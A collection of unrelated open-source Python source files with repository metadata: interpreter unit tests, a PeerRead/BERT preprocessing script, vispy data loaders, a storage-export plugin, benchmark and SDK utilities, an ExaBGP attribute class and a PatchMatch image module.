import unittest class LexerTestCase(unittest.TestCase): def makeLexer(self, text): from spi import Lexer lexer = Lexer(text) return lexer def test_tokens(self): from spi import TokenType records = ( ('234', TokenType.INTEGER_CONST, 234), ('3.14', TokenType.REAL_CONST, 3.14), ('*', TokenType.MUL, '*'), ('DIV', TokenType.INTEGER_DIV, 'DIV'), ('/', TokenType.FLOAT_DIV, '/'), ('+', TokenType.PLUS, '+'), ('-', TokenType.MINUS, '-'), ('(', TokenType.LPAREN, '('), (')', TokenType.RPAREN, ')'), (':=', TokenType.ASSIGN, ':='), ('.', TokenType.DOT, '.'), ('number', TokenType.ID, 'number'), (';', TokenType.SEMI, ';'), ('BEGIN', TokenType.BEGIN, 'BEGIN'), ('END', TokenType.END, 'END'), ('PROCEDURE', TokenType.PROCEDURE, 'PROCEDURE'), ) for text, tok_type, tok_val in records: lexer = self.makeLexer(text) token = lexer.get_next_token() self.assertEqual(token.type, tok_type) self.assertEqual(token.value, tok_val) def test_lexer_exception(self): from spi import LexerError lexer = self.makeLexer('<') with self.assertRaises(LexerError): lexer.get_next_token() class ParserTestCase(unittest.TestCase): def makeParser(self, text): from spi import Lexer, Parser lexer = Lexer(text) parser = Parser(lexer) return parser def test_expression_invalid_syntax_01(self): from spi import ParserError, ErrorCode parser = self.makeParser( """ PROGRAM Test; VAR a : INTEGER; BEGIN a := 10 * ; {Invalid syntax} END. """ ) with self.assertRaises(ParserError) as cm: parser.parse() the_exception = cm.exception self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN) self.assertEqual(the_exception.token.value, ';') self.assertEqual(the_exception.token.lineno, 6) def test_expression_invalid_syntax_02(self): from spi import ParserError, ErrorCode parser = self.makeParser( """ PROGRAM Test; VAR a : INTEGER; BEGIN a := 1 (1 + 2); {Invalid syntax} END. """ ) with self.assertRaises(ParserError) as cm: parser.parse() the_exception = cm.exception self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN) self.assertEqual(the_exception.token.value, '(') self.assertEqual(the_exception.token.lineno, 6) def test_maximum_one_VAR_block_is_allowed(self): from spi import ParserError, ErrorCode # zero VARs parser = self.makeParser( """ PROGRAM Test; BEGIN END. """ ) parser.parse() # one VAR parser = self.makeParser( """ PROGRAM Test; VAR a : INTEGER; BEGIN END. """ ) parser.parse() parser = self.makeParser( """ PROGRAM Test; VAR a : INTEGER; VAR b : INTEGER; BEGIN a := 5; b := a + 10; END. """ ) with self.assertRaises(ParserError) as cm: parser.parse() the_exception = cm.exception self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN) self.assertEqual(the_exception.token.value, 'VAR') self.assertEqual(the_exception.token.lineno, 5) # second VAR class SemanticAnalyzerTestCase(unittest.TestCase): def runSemanticAnalyzer(self, text): from spi import Lexer, Parser, SemanticAnalyzer lexer = Lexer(text) parser = Parser(lexer) tree = parser.parse() semantic_analyzer = SemanticAnalyzer() semantic_analyzer.visit(tree) return semantic_analyzer def test_semantic_duplicate_id_error(self): from spi import SemanticError, ErrorCode with self.assertRaises(SemanticError) as cm: self.runSemanticAnalyzer( """ PROGRAM Test; VAR a : INTEGER; a : REAL; {Duplicate identifier} BEGIN a := 5; END. """ ) the_exception = cm.exception self.assertEqual(the_exception.error_code, ErrorCode.DUPLICATE_ID) self.assertEqual(the_exception.token.value, 'a') self.assertEqual(the_exception.token.lineno, 5) def test_semantic_id_not_found_error(self): from spi import SemanticError, ErrorCode with self.assertRaises(SemanticError) as cm: self.runSemanticAnalyzer( """ PROGRAM Test; VAR a : INTEGER; BEGIN a := 5 + b; END. """ ) the_exception = cm.exception self.assertEqual(the_exception.error_code, ErrorCode.ID_NOT_FOUND) self.assertEqual(the_exception.token.value, 'b') class TestCallStack: def __init__(self): self._records = [] def push(self, ar): self._records.append(ar) def pop(self): # do nothing pass def peek(self): return self._records[-1] class InterpreterTestCase(unittest.TestCase): def makeInterpreter(self, text): from spi import Lexer, Parser, SemanticAnalyzer, Interpreter lexer = Lexer(text) parser = Parser(lexer) tree = parser.parse() semantic_analyzer = SemanticAnalyzer() semantic_analyzer.visit(tree) interpreter = Interpreter(tree) interpreter.call_stack = TestCallStack() return interpreter def test_integer_arithmetic_expressions(self): for expr, result in ( ('3', 3), ('2 + 7 * 4', 30), ('7 - 8 DIV 4', 5), ('14 + 2 * 3 - 6 DIV 2', 17), ('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1))', 22), ('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1)) DIV (2 + 3) - 5 - 3 + (8)', 10), ('7 + (((3 + 2)))', 12), ('- 3', -3), ('+ 3', 3), ('5 - - - + - 3', 8), ('5 - - - + - (3 + 4) - +2', 10), ): interpreter = self.makeInterpreter( """PROGRAM Test; VAR a : INTEGER; BEGIN a := %s END. """ % expr ) interpreter.interpret() ar = interpreter.call_stack.peek() self.assertEqual(ar['a'], result) def test_float_arithmetic_expressions(self): for expr, result in ( ('3.14', 3.14), ('2.14 + 7 * 4', 30.14), ('7.14 - 8 / 4', 5.14), ): interpreter = self.makeInterpreter( """PROGRAM Test; VAR a : REAL; BEGIN a := %s END. """ % expr ) interpreter.interpret() ar = interpreter.call_stack.peek() self.assertEqual(ar['a'], result) def test_procedure_call(self): text = """\ program Main; procedure Alpha(a : integer; b : integer); var x : integer; begin x := (a + b ) * 2; end; begin { Main } Alpha(3 + 5, 7); end. { Main } """ interpreter = self.makeInterpreter(text) interpreter.interpret() ar = interpreter.call_stack.peek() self.assertEqual(ar['a'], 8) self.assertEqual(ar['b'], 7) self.assertEqual(ar['x'], 30) self.assertEqual(ar.nesting_level, 2) def test_program(self): text = """\ PROGRAM Part12; VAR number : INTEGER; a, b : INTEGER; y : REAL; PROCEDURE P1; VAR a : REAL; k : INTEGER; PROCEDURE P2; VAR a, z : INTEGER; BEGIN {P2} z := 777; END; {P2} BEGIN {P1} END; {P1} BEGIN {Part12} number := 2; a := number ; b := 10 * a + 10 * number DIV 4; y := 20 / 7 + 3.14 END. {Part12} """ interpreter = self.makeInterpreter(text) interpreter.interpret() ar = interpreter.call_stack.peek() self.assertEqual(len(ar.members.keys()), 4) self.assertEqual(ar['number'], 2) self.assertEqual(ar['a'], 2) self.assertEqual(ar['b'], 25) self.assertAlmostEqual(ar['y'], float(20) / 7 + 3.14) # 5.9971... if __name__ == '__main__': unittest.main()
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
dveni/causal-text-embeddings
114
9248
<filename>src/PeerRead/data_cleaning/process_PeerRead_abstracts.py """ Simple pre-processing for PeerRead papers. Takes in JSON formatted data from ScienceParse and outputs a tfrecord Reference example: https://github.com/tensorlayer/tensorlayer/blob/9528da50dfcaf9f0f81fba9453e488a1e6c8ee8f/examples/data_process/tutorial_tfrecord3.py """ import argparse import glob import os import random import io import json from dateutil.parser import parse as parse_date import tensorflow as tf import bert.tokenization as tokenization from PeerRead.ScienceParse.Paper import Paper from PeerRead.ScienceParse.ScienceParseReader import ScienceParseReader from PeerRead.data_cleaning.PeerRead_hand_features import get_PeerRead_hand_features rng = random.Random(0) def process_json_paper(paper_json_filename, scienceparse_dir, tokenizer): paper = Paper.from_json(paper_json_filename) paper.SCIENCEPARSE = ScienceParseReader.read_science_parse(paper.ID, paper.TITLE, paper.ABSTRACT, scienceparse_dir) # tokenize PeerRead features try: title_tokens = tokenizer.tokenize(paper.TITLE) except ValueError: # missing titles are quite common sciparse print("Missing title for " + paper_json_filename) title_tokens = None abstract_tokens = tokenizer.tokenize(paper.ABSTRACT) text_features = {'title': title_tokens, 'abstract': abstract_tokens} context_features = {'authors': paper.AUTHORS, 'accepted': paper.ACCEPTED, 'name': paper.ID} # add hand crafted features from PeerRead pr_hand_features = get_PeerRead_hand_features(paper) context_features.update(pr_hand_features) return text_features, context_features def bert_process_sentence(example_tokens, max_seq_length, tokenizer): """ Tokenization and pre-processing of text as expected by Bert Parameters ---------- example_tokens max_seq_length tokenizer Returns ------- """ # Account for [CLS] and [SEP] with "- 2" if len(example_tokens) > max_seq_length - 2: example_tokens = example_tokens[0:(max_seq_length - 2)] # The convention in BERT for single sequences is: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. (vv: Not relevant for us) # For classification tasks, the first vector (corresponding to [CLS]) is # used as as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. # vv: segment_ids seem to be the same as type_ids tokens = [] segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in example_tokens: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length return input_ids, input_mask, segment_ids def paper_to_bert_Example(text_features, context_features, max_seq_length, tokenizer): """ Parses the input paper into a tf.Example as expected by Bert Note: the docs for tensorflow Example are awful ¯\_(ツ)_/¯ """ abstract_features = {} abstract_tokens, abstract_padding_mask, _ = \ bert_process_sentence(text_features['abstract'], max_seq_length, tokenizer) abstract_features["token_ids"] = _int64_feature(abstract_tokens) abstract_features["token_mask"] = _int64_feature(abstract_padding_mask) # abstract_features["segment_ids"] = create_int_feature(feature.segment_ids) TODO: ommission may cause bugs # abstract_features["label_ids"] = _int64_feature([feature.label_id]) # non-sequential features tf_context_features, tf_context_features_types = _dict_of_nonlist_numerical_to_tf_features(context_features) features = {**tf_context_features, **abstract_features} tf_example = tf.train.Example(features=tf.train.Features(feature=features)) return tf_example def _int64_feature(value): """Wrapper for inserting an int64 Feature into a SequenceExample proto, e.g, An integer label. """ if isinstance(value, list): return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) else: return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) def _float_feature(value): """Wrapper for inserting a float Feature into a SequenceExample proto, e.g, An integer label. """ if isinstance(value, list): return tf.train.Feature(float_list=tf.train.FloatList(value=value)) else: return tf.train.Feature(float_list=tf.train.FloatList(value=[value])) def _bytes_feature(value): """Wrapper for inserting a bytes Feature into a SequenceExample proto, e.g, an image in byte """ # return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)])) return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _dict_of_nonlist_numerical_to_tf_features(my_dict): """ Strip out non-numerical features Returns tf_features_dict: a dictionary suitable for passing to tf.train.example tf_types_dict: a dictionary of the tf types of previous dict """ tf_types_dict = {} tf_features_dict = {} for k, v in my_dict.items(): if isinstance(v, int) or isinstance(v, bool): tf_features_dict[k] = _int64_feature(v) tf_types_dict[k] = tf.int64 elif isinstance(v, float): tf_features_dict[k] = _float_feature(v) tf_types_dict[k] = tf.float32 else: pass return tf_features_dict, tf_types_dict venues = {'acl': 1, 'conll': 2, 'iclr': 3, 'nips': 4, 'icml': 5, 'emnlp': 6, 'aaai': 7, 'hlt-naacl': 8, 'arxiv': 0} def _venues(venue_name): if venue_name.lower() in venues: return venues[venue_name.lower()] else: return -1 def _arxiv_subject(subjects): subject = subjects[0] if 'lg' in subject.lower(): return 0 elif 'cl' in subject.lower(): return 1 elif 'ai' in subject.lower(): return 2 else: raise Exception("arxiv subject not recognized") def clean_PeerRead_dataset(review_json_dir, parsedpdf_json_dir, venue, year, out_dir, out_file, max_abs_len, tokenizer, default_accept=1, is_arxiv = False): if not os.path.exists(out_dir): os.makedirs(out_dir) print('Reading reviews from...', review_json_dir) paper_json_filenames = sorted(glob.glob('{}/*.json'.format(review_json_dir))) with tf.python_io.TFRecordWriter(out_dir + "/" + out_file) as writer: for idx, paper_json_filename in enumerate(paper_json_filenames): text_features, context_features = process_json_paper(paper_json_filename, parsedpdf_json_dir, tokenizer) if context_features['accepted'] is None: # missing for conferences other than ICLR (we only see accepts) context_features['accepted'] = default_accept many_split = rng.randint(0, 100) # useful for easy data splitting later # other context features arxiv = -1 if is_arxiv: with io.open(paper_json_filename) as json_file: loaded = json.load(json_file) year = parse_date(loaded['DATE_OF_SUBMISSION']).year venue = _venues(loaded['conference']) arxiv = _arxiv_subject([loaded['SUBJECTS']]) extra_context = {'id': idx, 'venue': venue, 'year': year, 'many_split': many_split, 'arxiv': arxiv} context_features.update(extra_context) # turn it into a tf.data example paper_ex = paper_to_bert_Example(text_features, context_features, max_seq_length=max_abs_len, tokenizer=tokenizer) writer.write(paper_ex.SerializeToString()) def main(): parser = argparse.ArgumentParser() parser.add_argument('--review-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/reviews') parser.add_argument('--parsedpdf-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/parsed_pdfs') parser.add_argument('--out-dir', type=str, default='../dat/PeerRead/proc') parser.add_argument('--out-file', type=str, default='arxiv-all.tf_record') parser.add_argument('--vocab-file', type=str, default='../../bert/pre-trained/uncased_L-12_H-768_A-12/vocab.txt') parser.add_argument('--max-abs-len', type=int, default=250) parser.add_argument('--venue', type=int, default=0) parser.add_argument('--year', type=int, default=2017) args = parser.parse_args() tokenizer = tokenization.FullTokenizer( vocab_file=args.vocab_file, do_lower_case=True) clean_PeerRead_dataset(args.review_json_dir, args.parsedpdf_json_dir, args.venue, args.year, args.out_dir, args.out_file, args.max_abs_len, tokenizer, is_arxiv=True) if __name__ == "__main__": main()
vispy/io/datasets.py
hmaarrfk/vispy
2,617
9274
# -*- coding: utf-8 -*- # Copyright (c) Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. import numpy as np from os import path as op from ..util import load_data_file # This is the package data dir, not the dir for config, etc. DATA_DIR = op.join(op.dirname(__file__), '_data') def load_iris(): """Load the iris dataset Returns ------- iris : NpzFile data['data'] : a (150, 4) NumPy array with the iris' features data['group'] : a (150,) NumPy array with the iris' group """ return np.load(load_data_file('iris/iris.npz', force_download='2014-09-04')) def load_crate(): """Load an image of a crate Returns ------- crate : array 256x256x3 crate image. """ return np.load(load_data_file('orig/crate.npz'))['crate'] def pack_unit(value): """Packs float values between [0,1] into 4 unsigned int8 Returns ------- pack: array packed interpolation kernel """ pack = np.zeros(value.shape + (4,), dtype=np.ubyte) for i in range(4): value, pack[..., i] = np.modf(value * 256.) return pack def pack_ieee(value): """Packs float ieee binary representation into 4 unsigned int8 Returns ------- pack: array packed interpolation kernel """ return np.fromstring(value.tobytes(), np.ubyte).reshape((value.shape + (4,))) def load_spatial_filters(packed=True): """Load spatial-filters kernel Parameters ---------- packed : bool Whether or not the data should be in "packed" representation for use in GLSL code. Returns ------- kernel : array 16x1024x4 (packed float in rgba) or 16x1024 (unpacked float) 16 interpolation kernel with length 1024 each. names : tuple of strings Respective interpolation names, plus "Nearest" which does not require a filter but can still be used """ names = ("Bilinear", "Hanning", "Hamming", "Hermite", "Kaiser", "Quadric", "Bicubic", "CatRom", "Mitchell", "Spline16", "Spline36", "Gaussian", "Bessel", "Sinc", "Lanczos", "Blackman", "Nearest") kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy')) if packed: # convert the kernel to a packed representation kernel = pack_unit(kernel) return kernel, names
plugin/DataExport/extend.py
konradotto/TS
125
9281
#!/usr/bin/python # Copyright (C) 2015 Ion Torrent Systems, Inc. All Rights Reserved import subprocess import re pluginName = 'DataExport' pluginDir = "" networkFS = ["nfs", "cifs"] localFS = ["ext4", "ext3", "xfs", "ntfs", "exfat", "vboxsf"] supportedFS = ",".join(localFS + networkFS) def test(bucket): return bucket def runProcess(exe): p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) return iter(p.stdout.readline, b'') def runProcessAndReturnLastLine(exe): p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) return p.stdout.readlines()[-1] def backupDevices(bucket): devices = "" cmd = "mount -l -t " + supportedFS for line in runProcess(cmd.split()): line_arr = line.split() folder = line_arr[2] fstype = line_arr[4] perms = line_arr[5] if perms.find('w') != -1: use = True if fstype in localFS: m = re.match('^(/media|/mnt)', folder) if not m: use = False if use: cmd2 = "df -h %s " % folder df = runProcessAndReturnLastLine(cmd2.split()) avail = df.split()[2] devices = devices + "<OPTION VALUE=\"" + folder + "\">" + folder + " (" + avail + " free, " + fstype + ")</option>" return devices
amlb/benchmarks/file.py
pplonski/automlbenchmark
282
9293
<filename>amlb/benchmarks/file.py<gh_stars>100-1000 import logging import os from typing import List, Tuple, Optional from amlb.utils import config_load, Namespace log = logging.getLogger(__name__) def _find_local_benchmark_definition(name: str, benchmark_definition_dirs: List[str]) -> str: # 'name' should be either a full path to the benchmark, # or a filename (without extension) in the benchmark directory. if os.path.exists(name): return name for bd in benchmark_definition_dirs: bf = os.path.join(bd, f"{name}.yaml") if os.path.exists(bf): # We don't account for duplicate definitions (yet). return bf # should we support s3 and check for s3 path before raising error? raise ValueError(f"Incorrect benchmark name or path `{name}`, name not available in {benchmark_definition_dirs}.") def load_file_benchmark(name: str, benchmark_definition_dirs: List[str]) -> Tuple[str, Optional[str], List[Namespace]]: """ Loads benchmark from a local file. """ benchmark_file = _find_local_benchmark_definition(name, benchmark_definition_dirs) log.info("Loading benchmark definitions from %s.", benchmark_file) tasks = config_load(benchmark_file) benchmark_name, _ = os.path.splitext(os.path.basename(benchmark_file)) return benchmark_name, benchmark_file, tasks
test/manual/documents/test_iter_documents.py
membranepotential/mendeley-python-sdk
103
9305
<gh_stars>100-1000 from itertools import islice from test import get_user_session, cassette from test.resources.documents import delete_all_documents, create_document def test_should_iterate_through_documents(): session = get_user_session() delete_all_documents() with cassette('fixtures/resources/documents/iter_documents/iterate_through_documents.yaml'): create_document(session, 'title 1') create_document(session, 'title 2') create_document(session, 'title 3') docs = list(islice(session.documents.iter(page_size=2), 3)) assert len(docs) == 3 assert docs[0].title == 'title 1' assert docs[1].title == 'title 2' assert docs[2].title == 'title 3'
src/exabgp/bgp/message/update/attribute/bgpls/link/mplsmask.py
pierky/exabgp
1,560
9319
# encoding: utf-8 """ mplsmask.py Created by <NAME> on 2016-12-01. Copyright (c) 2014-2017 Exa Networks. All rights reserved. """ from exabgp.bgp.message.notification import Notify from exabgp.bgp.message.update.attribute.bgpls.linkstate import LinkState from exabgp.bgp.message.update.attribute.bgpls.linkstate import FlagLS # 0 1 2 3 # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Type | Length | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |L|R| Reserved | # +-+-+-+-+-+-+-+-+ # https://tools.ietf.org/html/rfc7752#section-3.3.2.2 MPLS Protocol Mask # # +------------+------------------------------------------+-----------+ # | Bit | Description | Reference | # +------------+------------------------------------------+-----------+ # | 'L' | Label Distribution Protocol (LDP) | [RFC5036] | # | 'R' | Extension to RSVP for LSP Tunnels | [RFC3209] | # | | (RSVP-TE) | | # | 'Reserved' | Reserved for future use | | # +------------+------------------------------------------+-----------+ # RFC 7752 3.3.2.2. MPLS Protocol Mask TLV @LinkState.register() class MplsMask(FlagLS): REPR = 'MPLS Protocol mask' JSON = 'mpls-mask' TLV = 1094 FLAGS = ['LDP', 'RSVP-TE', 'RSV', 'RSV', 'RSV', 'RSV', 'RSV', 'RSV'] LEN = 1
image_analogy/losses/patch_matcher.py
kaldap/image-analogies
3,722
9327
import numpy as np import scipy.interpolate import scipy.ndimage from sklearn.feature_extraction.image import extract_patches_2d, reconstruct_from_patches_2d def _calc_patch_grid_dims(shape, patch_size, patch_stride): x_w, x_h, x_c = shape num_rows = 1 + (x_h - patch_size) // patch_stride num_cols = 1 + (x_w - patch_size) // patch_stride return num_rows, num_cols def make_patch_grid(x, patch_size, patch_stride=1): '''x shape: (num_channels, rows, cols)''' x = x.transpose(2, 1, 0) patches = extract_patches_2d(x, (patch_size, patch_size)) x_w, x_h, x_c = x.shape num_rows, num_cols = _calc_patch_grid_dims(x.shape, patch_size, patch_stride) patches = patches.reshape((num_rows, num_cols, patch_size, patch_size, x_c)) patches = patches.transpose((0, 1, 4, 2, 3)) #patches = np.rollaxis(patches, -1, 2) return patches def combine_patches_grid(in_patches, out_shape): '''Reconstruct an image from these `patches` input shape: (rows, cols, channels, patch_row, patch_col) ''' num_rows, num_cols = in_patches.shape[:2] num_channels = in_patches.shape[-3] patch_size = in_patches.shape[-1] num_patches = num_rows * num_cols in_patches = np.reshape(in_patches, (num_patches, num_channels, patch_size, patch_size)) # (patches, channels, pr, pc) in_patches = np.transpose(in_patches, (0, 2, 3, 1)) # (patches, p, p, channels) recon = reconstruct_from_patches_2d(in_patches, out_shape) return recon.transpose(2, 1, 0).astype(np.float32) class PatchMatcher(object): '''A matcher of image patches inspired by the PatchMatch algorithm. image shape: (width, height, channels) ''' def __init__(self, input_shape, target_img, patch_size=1, patch_stride=1, jump_size=0.5, num_propagation_steps=5, num_random_steps=5, random_max_radius=1.0, random_scale=0.5): self.input_shape = input_shape self.patch_size = patch_size self.patch_stride = patch_stride self.jump_size = jump_size self.num_propagation_steps = num_propagation_steps self.num_random_steps = num_random_steps self.random_max_radius = random_max_radius self.random_scale = random_scale self.num_input_rows, self.num_input_cols = _calc_patch_grid_dims(input_shape, patch_size, patch_stride) self.target_patches = make_patch_grid(target_img, patch_size) self.target_patches_normed = self.normalize_patches(self.target_patches) self.coords = np.random.uniform(0.0, 1.0, # TODO: switch to pixels (2, self.num_input_rows, self.num_input_cols))# * [[[self.num_input_rows]],[[self.num_input_cols]]] self.similarity = np.zeros(input_shape[:2:-1], dtype=np.float32) self.min_propagration_row = 1.0 / self.num_input_rows self.min_propagration_col = 1.0 / self.num_input_cols self.delta_row = np.array([[[self.min_propagration_row]], [[0.0]]]) self.delta_col = np.array([[[0.0]], [[self.min_propagration_col]]]) def update(self, input_img, reverse_propagation=False): input_patches = self.get_patches_for(input_img) self.update_with_patches(self.normalize_patches(input_patches), reverse_propagation=reverse_propagation) def update_with_patches(self, input_patches, reverse_propagation=False): self._propagate(input_patches, reverse_propagation=reverse_propagation) self._random_update(input_patches) def get_patches_for(self, img): return make_patch_grid(img, self.patch_size); def normalize_patches(self, patches): norm = np.sqrt(np.sum(np.square(patches), axis=(2, 3, 4), keepdims=True)) return patches / norm def _propagate(self, input_patches, reverse_propagation=False): if reverse_propagation: roll_direction = 1 else: roll_direction = -1 sign = float(roll_direction) for step_i in range(self.num_propagation_steps): new_coords = self.clip_coords(np.roll(self.coords, roll_direction, 1) + self.delta_row * sign) coords_row, similarity_row = self.eval_state(new_coords, input_patches) new_coords = self.clip_coords(np.roll(self.coords, roll_direction, 2) + self.delta_col * sign) coords_col, similarity_col = self.eval_state(new_coords, input_patches) self.coords, self.similarity = self.take_best(coords_row, similarity_row, coords_col, similarity_col) def _random_update(self, input_patches): for alpha in range(1, self.num_random_steps + 1): # NOTE this should actually stop when the move is < 1 new_coords = self.clip_coords(self.coords + np.random.uniform(-self.random_max_radius, self.random_max_radius, self.coords.shape) * self.random_scale ** alpha) self.coords, self.similarity = self.eval_state(new_coords, input_patches) def eval_state(self, new_coords, input_patches): new_similarity = self.patch_similarity(input_patches, new_coords) delta_similarity = new_similarity - self.similarity coords = np.where(delta_similarity > 0, new_coords, self.coords) best_similarity = np.where(delta_similarity > 0, new_similarity, self.similarity) return coords, best_similarity def take_best(self, coords_a, similarity_a, coords_b, similarity_b): delta_similarity = similarity_a - similarity_b best_coords = np.where(delta_similarity > 0, coords_a, coords_b) best_similarity = np.where(delta_similarity > 0, similarity_a, similarity_b) return best_coords, best_similarity def patch_similarity(self, source, coords): '''Check the similarity of the patches specified in coords.''' target_vals = self.lookup_coords(self.target_patches_normed, coords) err = source * target_vals return np.sum(err, axis=(2, 3, 4)) def clip_coords(self, coords): # TODO: should this all be in pixel space? coords = np.clip(coords, 0.0, 1.0) return coords def lookup_coords(self, x, coords): x_shape = np.expand_dims(np.expand_dims(x.shape, -1), -1) i_coords = np.round(coords * (x_shape[:2] - 1)).astype('int32') return x[i_coords[0], i_coords[1]] def get_reconstruction(self, patches=None, combined=None): if combined is not None: patches = make_patch_grid(combined, self.patch_size) if patches is None: patches = self.target_patches patches = self.lookup_coords(patches, self.coords) recon = combine_patches_grid(patches, self.input_shape) return recon def scale(self, new_shape, new_target_img): '''Create a new matcher of the given shape and replace its state with a scaled up version of the current matcher's state. ''' new_matcher = PatchMatcher(new_shape, new_target_img, patch_size=self.patch_size, patch_stride=self.patch_stride, jump_size=self.jump_size, num_propagation_steps=self.num_propagation_steps, num_random_steps=self.num_random_steps, random_max_radius=self.random_max_radius, random_scale=self.random_scale) new_matcher.coords = congrid(self.coords, new_matcher.coords.shape, method='neighbour') new_matcher.similarity = congrid(self.similarity, new_matcher.coords.shape, method='neighbour') return new_matcher def congrid(a, newdims, method='linear', centre=False, minusone=False): '''Arbitrary resampling of source array to new dimension sizes. Currently only supports maintaining the same number of dimensions. To use 1-D arrays, first promote them to shape (x,1). Uses the same parameters and creates the same co-ordinate lookup points as IDL''s congrid routine, which apparently originally came from a VAX/VMS routine of the same name. method: neighbour - closest value from original data nearest and linear - uses n x 1-D interpolations using scipy.interpolate.interp1d (see Numerical Recipes for validity of use of n 1-D interpolations) spline - uses ndimage.map_coordinates centre: True - interpolation points are at the centres of the bins False - points are at the front edge of the bin minusone: For example- inarray.shape = (i,j) & new dimensions = (x,y) False - inarray is resampled by factors of (i/x) * (j/y) True - inarray is resampled by(i-1)/(x-1) * (j-1)/(y-1) This prevents extrapolation one element beyond bounds of input array. ''' if not a.dtype in [np.float64, np.float32]: a = np.cast[float](a) m1 = np.cast[int](minusone) ofs = np.cast[int](centre) * 0.5 old = np.array( a.shape ) ndims = len( a.shape ) if len( newdims ) != ndims: print("[congrid] dimensions error. " \ "This routine currently only support " \ "rebinning to the same number of dimensions.") return None newdims = np.asarray( newdims, dtype=float ) dimlist = [] if method == 'neighbour': for i in range( ndims ): base = np.indices(newdims)[i] dimlist.append( (old[i] - m1) / (newdims[i] - m1) \ * (base + ofs) - ofs ) cd = np.array( dimlist ).round().astype(int) newa = a[list( cd )] return newa elif method in ['nearest','linear']: # calculate new dims for i in range( ndims ): base = np.arange( newdims[i] ) dimlist.append( (old[i] - m1) / (newdims[i] - m1) \ * (base + ofs) - ofs ) # specify old dims olddims = [np.arange(i, dtype = np.float) for i in list( a.shape )] # first interpolation - for ndims = any mint = scipy.interpolate.interp1d( olddims[-1], a, kind=method ) newa = mint( dimlist[-1] ) trorder = [ndims - 1] + range( ndims - 1 ) for i in range( ndims - 2, -1, -1 ): newa = newa.transpose( trorder ) mint = scipy.interpolate.interp1d( olddims[i], newa, kind=method ) newa = mint( dimlist[i] ) if ndims > 1: # need one more transpose to return to original dimensions newa = newa.transpose( trorder ) return newa elif method in ['spline']: oslices = [ slice(0,j) for j in old ] oldcoords = np.ogrid[oslices] nslices = [ slice(0,j) for j in list(newdims) ] newcoords = np.mgrid[nslices] newcoords_dims = range(np.rank(newcoords)) #make first index last newcoords_dims.append(newcoords_dims.pop(0)) newcoords_tr = newcoords.transpose(newcoords_dims) # makes a view that affects newcoords newcoords_tr += ofs deltas = (np.asarray(old) - m1) / (newdims - m1) newcoords_tr *= deltas newcoords_tr -= ofs newa = scipy.ndimage.map_coordinates(a, newcoords) return newa else: print("Congrid error: Unrecognized interpolation type.\n", \ "Currently only \'neighbour\', \'nearest\',\'linear\',", \ "and \'spline\' are supported.") return None if __name__ == '__main__': import sys import time from scipy.misc import imsave from image_analogy.img_utils import load_image, preprocess_image, deprocess_image content_image_path, style_image_path, output_prefix = sys.argv[1:] jump_size = 1.0 num_steps = 7 patch_size = 1 patch_stride = 1 feat_chans = 512 feat_style_shape = (feat_chans, 12, 18) feat_style = np.random.uniform(0.0, 1.0, feat_style_shape) feat_in_shape = (feat_chans, 17, 10) feat_in = np.random.uniform(0.0, 1.0, feat_in_shape) matcher = PatchMatcher(feat_in_shape[::-1], feat_style, patch_size=patch_size) feat_in_normed = matcher.normalize_patches(matcher.get_patches_for(feat_in)) for i in range(num_steps): matcher.update_with_patches(feat_in_normed) r = matcher.get_reconstruction() content_img_img = load_image(content_image_path) content_n_channels, content_n_rows, content_n_cols = content_img_img.shape[::-1] content_img = preprocess_image(content_img_img, content_n_cols, content_n_rows)[0]#.transpose((2,1,0)) style_img = load_image(style_image_path) style_n_channels, style_n_rows, style_n_cols = content_img_img.shape[::-1] style_img = preprocess_image( load_image(style_image_path), style_n_cols, style_n_rows)[0]#.transpose((2,1,0)) pg = make_patch_grid(content_img, patch_size) result = combine_patches_grid(pg, content_img.shape[::-1]) outimg = deprocess_image(result, contrast_percent=0) imsave(output_prefix + '_bestre.png', outimg) # # # matcher = PatchMatcher((content_n_cols, content_n_rows, content_n_channels), style_img, patch_size=patch_size) for i in range(num_steps): start = time.time() matcher.update(content_img, reverse_propagation=bool(i % 2)) print(matcher.similarity.min(), matcher.similarity.max(), matcher.similarity.mean()) end = time.time() #print end-start start = time.time() result = matcher.get_reconstruction(patches=matcher.target_patches) print(result.shape) end = time.time() print(end-start) outimg = deprocess_image(result, contrast_percent=0) # # imsave takes (rows, cols, channels) imsave(output_prefix + '_best.png', outimg)
vnpy/gateway/rohon/__init__.py
funrunskypalace/vnpy
323
9333
from .rohon_gateway import RohonGateway
tests/unit/sagemaker/tensorflow/test_estimator_init.py
LastRemote/sagemaker-python-sdk
1,690
9348
